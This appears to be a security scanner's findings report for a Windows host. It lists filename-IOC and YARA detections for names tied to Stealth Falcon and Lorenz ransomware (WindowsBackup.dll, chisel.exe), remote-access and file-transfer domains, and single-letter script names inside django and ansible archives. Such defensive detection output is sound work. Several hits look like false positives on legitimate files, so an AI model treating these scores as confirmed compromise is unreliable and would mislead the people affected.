Sep 10 13:08:26 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
80
FILE:
E:\Windows\WinSxS\amd64_userexperience-desktop_31bf3856ad364e35_10.0.22621.3880_none_0c186f11e5fa3786\n\CBS\WindowsBackup.dll
EXT:
.dll
TYPE:
UNKNOWN
SIZE:
569461
FIRSTBYTES:
529b4fb350413330002a25bd78b2da01b07e4000 / ROPA30*%x~@
CREATED:
Mon Jul 22 15:15:50.535 2024
MODIFIED:
Sun Jun 2 22:58:07.000 2024
ACCESSED:
Tue Jul 23 13:03:53.046 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
NT SERVICE\TrustedInstaller
REASON_1:
Filename IOC \WindowsBackup.dll
SUBSCORE_1:
80
REF_1:
Stealth Falcon Filename IOC https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Warning 55
|
Sep 10 13:08:40 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
80
FILE:
E:\Windows\WinSxS\amd64_userexperience-desktop_31bf3856ad364e35_10.0.22621.4036_none_0c696635e5be7038\n\CBS\WindowsBackup.dll
EXT:
.dll
TYPE:
UNKNOWN
SIZE:
573243
FIRSTBYTES:
03c057b150413330808e3c731cd5da01b07e4000 / WPA30<s~@
CREATED:
Tue Aug 13 19:52:49.833 2024
MODIFIED:
Sat Jul 13 23:56:46.000 2024
ACCESSED:
Tue Aug 13 19:55:34.134 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
NT SERVICE\TrustedInstaller
REASON_1:
Filename IOC \WindowsBackup.dll
SUBSCORE_1:
80
REF_1:
Stealth Falcon Filename IOC https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Warning 56
|
Sep 10 13:11:57 WIN-LRTT94FA08M/10.100.5.12
MODULE:
RegistryHive
MESSAGE:
Suspicious registry hive entries found
ENTRY:
{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;ProgramId;000686e3c383522ce70132c9963a47de5fa00000ffff[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;FileId;000012527700408fd8e700ef290bb230a88f63fd56c1[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;LowerCaseLongPath;c:\windows\syswow64\chisel.exe[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;Name;chisel.exe[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;BinaryType;pe64_amd64[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;LinkDate;01/01/1970 00:00:00[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;Size;9006080[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;Language;0[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;Usn;926634472
SCORE:
75
PATH:
E:\Windows\appcompat\Programs\Amcache.hve
KEY:
{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995
MODIFIED:
Tue Sep 3 09:38:51 2024
REASON_1:
Filename IOC \chisel.exe
SUBSCORE_1:
75
REF_1:
Lorenz Ransomware IOCs https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
c:\windows\syswow64\chisel.exe
EXISTS_1:
no
FILE_2:
E:\Windows\appcompat\Programs\Amcache.hve
EXISTS_2:
yes
TYPE_2:
Registry Hive
SIZE_2:
2097152
FIRSTBYTES_2:
726567663f0200003e020000eb413c7e27b6da01 / regf?>A<~'
CREATED_2:
Tue Jun 4 02:32:49.870 2024
OWNER_2:
NT AUTHORITY\SYSTEM
|
Warning 57
|
Sep 10 13:11:57 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Amcache
MESSAGE:
Suspicious Amcache entry found
ELEMENT:
FILE: c:\windows\syswow64\chisel.exe SHA1: 12527700408fd8e700ef290bb230a88f63fd56c1 SIZE: 9006080 DESCRIPTION: PRODUCT: COMPANY:
SCORE:
75
FILE:
c:\windows\syswow64\chisel.exe
SIZE:
9006080
DESCRIPTION:
FIRST_RUN:
Tue Sep 3 09:38:51 2024
CREATED:
Thu Jan 1 00:00:00 1970
PRODUCT:
COMPANY:
FILE_EXISTS:
no
REASON_1:
Filename IOC \chisel.exe
SUBSCORE_1:
75
REF_1:
Lorenz Ransomware IOCs https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
c:\windows\syswow64\chisel.exe
EXISTS_1:
no
|
Notices | |
---|---|
Notice 1
|
Sep 10 12:20:57 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Program Files (x86)\virtio\monitor\vm-agent-daemon.exe
EXT:
.exe
TYPE:
EXE
SIZE:
136704
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Wed May 8 17:05:10.000 2019
MODIFIED:
Wed May 8 17:05:10.000 2019
ACCESSED:
Tue Sep 3 13:11:26.649 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
IMPHASH:
2d74ef92f75a2cb8b74d1bf89f0c23d4
REASON_1:
YARA rule EXE_Susp_Cmds / Detects suspicious Windows command line commands in Executables
SUBSCORE_1:
40
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2017-11-11
TAGS_1:
EXE, FILE, HIGHVOL, SUSP, T1053_005, T1087_001, T1562_001
RULENAME_1: EXE_Susp_Cmds
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Notice 2
|
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
"cdn.discordapp.com": "{\"Tier1\": [6061, 8741], \"Tier2\": [3127, 7462, 1141, 3604]}",
SCORE:
40
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule KEYWORD_NOTICE_Domain_File_Transfer_Service_Aug23 / Detects potentially suspicious domains of file transfer services which might be used by attackers for data exfiltration or hosting of malware
SUBSCORE_1:
40
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-08-30
TAGS_1:
KEYWORD, T1020, T1569_002
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
|
Notice 3
|
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
"launch.getgo.com": "{\"Tier1\": [983, 6061], \"Tier2\": [1125, 8469, 9598]}",
SCORE:
50
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule yara_c2_getgo_com / Suspicious Domain Name / FQDN used by Remote Access Software 2023-09-16 https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md (SUSPICIOUS, REMOTE_CONTROL)
SUBSCORE_1:
50
REF_1:
not set
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULENAME_1: yara_c2_getgo_com
AUTHOR_1:
unknown
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
|
Notice 4
|
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
"secure.logmein.com": "{\"Tier1\": [6061, 5938, 214], \"Tier2\": [7816, 8469, 4426, 236]}",
SCORE:
50
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule yara_c2_logmein_com / Suspicious Domain Name / FQDN used by Remote Access Software 2023-09-16 https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md (SUSPICIOUS, REMOTE_CONTROL)
SUBSCORE_1:
50
REF_1:
not set
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULENAME_1: yara_c2_logmein_com
AUTHOR_1:
unknown
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
|
Notice 5
|
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
"secure.logmeinrescue.com": "{\"Tier1\": [6061, 5938], \"Tier2\": [7354, 2349, 8997, 7539, 3006, 9121]}",
SCORE:
50
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule yara_c2_secure_logmeinrescue_com / Suspicious Domain Name / FQDN used by Remote Access Software 2023-09-16 https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md (SUSPICIOUS, REMOTE_CONTROL)
SUBSCORE_1:
50
REF_1:
not set
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULENAME_1: yara_c2_secure_logmeinrescue_com
AUTHOR_1:
unknown
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
|
Notice 6
|
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
"www.logmein.com": "{\"Tier1\": [214, 6061, 5938], \"Tier2\": [8469, 4426, 236]}",
SCORE:
50
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule yara_c2_logmein_com / Suspicious Domain Name / FQDN used by Remote Access Software 2023-09-16 https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md (SUSPICIOUS, REMOTE_CONTROL)
SUBSCORE_1:
50
REF_1:
not set
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULENAME_1: yara_c2_logmein_com
AUTHOR_1:
unknown
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
|
Notice 7
|
Sep 10 12:27:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
Sep 03 10:42:45.293 INFO Get file handle: "C:\\Users\\j-taylor\\AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\extensions\\github\\testWorkspace\\x.txt" (attempt 1)
SCORE:
40
FILE:
E:\Users\j-taylor\AppData\Local\Temp\vscode-inno-updater-1725360164.log
LOG_MODIFIED:
Tue Sep 3 10:42:45 2024
LOG_ACCESSED:
Tue Sep 3 10:42:45 2024
LOG_CREATED:
Tue Sep 3 10:42:44 2024
REASON_1:
Filename IOC \x.txt
SUBSCORE_1:
40
REF_1:
BSI CSW-Nr. 2017-200525-1034
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
E:\Users\j-taylor\AppData\Local\Temp\vscode-inno-updater-1725360164.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
238926
FIRSTBYTES_1:
5365702030332031303a34323a34342e36373320 / Sep 03 10:42:44.673
CREATED_1:
Tue Sep 3 10:42:44.668 2024
|
Notice 8
|
Sep 10 12:27:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
Sep 03 10:42:45.307 INFO Get file handle: "C:\\Users\\j-taylor\\AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\extensions\\github\\testWorkspace\\PULL_REQUEST_TEMPLATE\\x.txt" (attempt 1)
SCORE:
40
FILE:
E:\Users\j-taylor\AppData\Local\Temp\vscode-inno-updater-1725360164.log
LOG_MODIFIED:
Tue Sep 3 10:42:45 2024
LOG_ACCESSED:
Tue Sep 3 10:42:45 2024
LOG_CREATED:
Tue Sep 3 10:42:44 2024
REASON_1:
Filename IOC \x.txt
SUBSCORE_1:
40
REF_1:
BSI CSW-Nr. 2017-200525-1034
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
E:\Users\j-taylor\AppData\Local\Temp\vscode-inno-updater-1725360164.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
238926
FIRSTBYTES_1:
5365702030332031303a34323a34342e36373320 / Sep 03 10:42:44.673
CREATED_1:
Tue Sep 3 10:42:44.668 2024
|
Notice 9
|
Sep 10 12:27:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
Sep 03 10:42:45.361 INFO Get file handle: "C:\\Users\\j-taylor\\AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\extensions\\github\\testWorkspace\\docs\\PULL_REQUEST_TEMPLATE\\x.txt" (attempt 1)
SCORE:
40
FILE:
E:\Users\j-taylor\AppData\Local\Temp\vscode-inno-updater-1725360164.log
LOG_MODIFIED:
Tue Sep 3 10:42:45 2024
LOG_ACCESSED:
Tue Sep 3 10:42:45 2024
LOG_CREATED:
Tue Sep 3 10:42:44 2024
REASON_1:
Filename IOC \x.txt
SUBSCORE_1:
40
REF_1:
BSI CSW-Nr. 2017-200525-1034
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
E:\Users\j-taylor\AppData\Local\Temp\vscode-inno-updater-1725360164.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
238926
FIRSTBYTES_1:
5365702030332031303a34323a34342e36373320 / Sep 03 10:42:44.673
CREATED_1:
Tue Sep 3 10:42:44.668 2024
|
Notice 10
|
Sep 10 12:27:42 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\a.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 11
|
Sep 10 12:27:42 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\b.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 12
|
Sep 10 12:27:42 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\d.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 13
|
Sep 10 12:27:42 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\e.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 14
|
Sep 10 12:27:42 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\f\g.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 15
|
Sep 10 12:27:45 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\migrations\test_migrations_clashing_prefix\a.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
83
FIRSTBYTES:
66726f6d20646a616e676f2e646220696d706f72 / from django.db impor
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 16
|
Sep 10 12:28:49 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip\ansible-devel\.azure-pipelines\commands\i.sh
EXT:
.sh
TYPE:
UNIX SCRIPT
SIZE:
393
FIRSTBYTES:
23212f7573722f62696e2f656e7620626173680a / #!/usr/bin/env bash
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Mon Jul 29 01:24:54.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 17
|
Sep 10 12:28:59 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_precedence\lib_with_extension\a.py
EXT:
.py
TYPE:
UNIX SCRIPT
SIZE:
180
FIRSTBYTES:
23212f7573722f62696e2f707974686f6e0a6672 / #!/usr/bin/python fr
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Mon Jul 29 01:24:54.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
